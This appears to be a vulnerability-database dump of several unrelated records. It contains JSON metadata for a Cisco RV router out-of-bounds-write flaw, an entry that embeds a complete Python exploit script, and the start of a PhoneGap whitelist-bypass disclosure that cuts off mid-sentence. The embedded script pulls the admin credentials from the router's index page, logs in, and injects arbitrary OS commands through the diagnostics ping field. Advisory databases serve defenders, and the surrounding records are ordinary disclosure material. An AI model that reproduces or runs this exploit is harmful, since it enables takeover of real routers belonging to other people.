Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0833", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "cve": "CVE-2021-1189", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1189", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41198", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374243", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1189", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1189", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1189", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1189", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1189", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41198", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-1044", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374243", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "db": "NVD", "id": "CVE-2021-1189" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The vulnerability exists in the following devices or models: Cisco Small Business RV110W, Cisco Small Business RV130, Cisco Small Business RV130W, Cisco Small Business RV215W", "sources": [ { "db": "NVD", "id": "CVE-2021-1189" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1189", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2021-002742", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41198", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-1044", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374243", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "id": "VAR-202101-0833", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" } ] }, "last_update_date": "2024-11-23T21:34:54.858000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41198)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272431" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374243" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1189" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41198" }, { "db": "VULHUB", "id": "VHN-374243" }, { "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "db": "NVD", "id": "CVE-2021-1189" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41198" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374243" }, { "date": "2021-09-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "date": "2021-01-13T21:15:12.723000", "db": "NVD", "id": "CVE-2021-1189" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41198" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374243" }, { "date": "2021-09-29T08:00:00", "db": "JVNDB", "id": "JVNDB-2021-002742" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1044" }, { "date": "2024-11-21T05:43:47.233000", "db": "NVD", "id": "CVE-2021-1189" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1044" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002742" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1044" } ], "trust": 0.6 } }
var-201403-0204
Vulnerability from variot
The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2
Cisco RV110W Password Disclosure and OS Command Execute.
Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
Date: 2018-08
Exploit Author: RySh
Vendor Homepage: https://www.cisco.com/
Version: 1.1.0.9
Tested on: RV110W 1.1.0.9
CVE : CVE-2014-0683, CVE-2015-6396
import os import sys import re import urllib import urllib2 import getopt import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Usage: ./{script_name} 192.168.1.1 443 "reboot"
if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]
# Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()
# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "1",
"ping_times": "3 |" + CMD + "|",
"ping_size": "64",
"wait_time": "4",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap.
Dear PhoneGap contributors,
PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.
-
Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects.
-
A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack.
-
PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\.)?" + origin));
For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.
-
PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using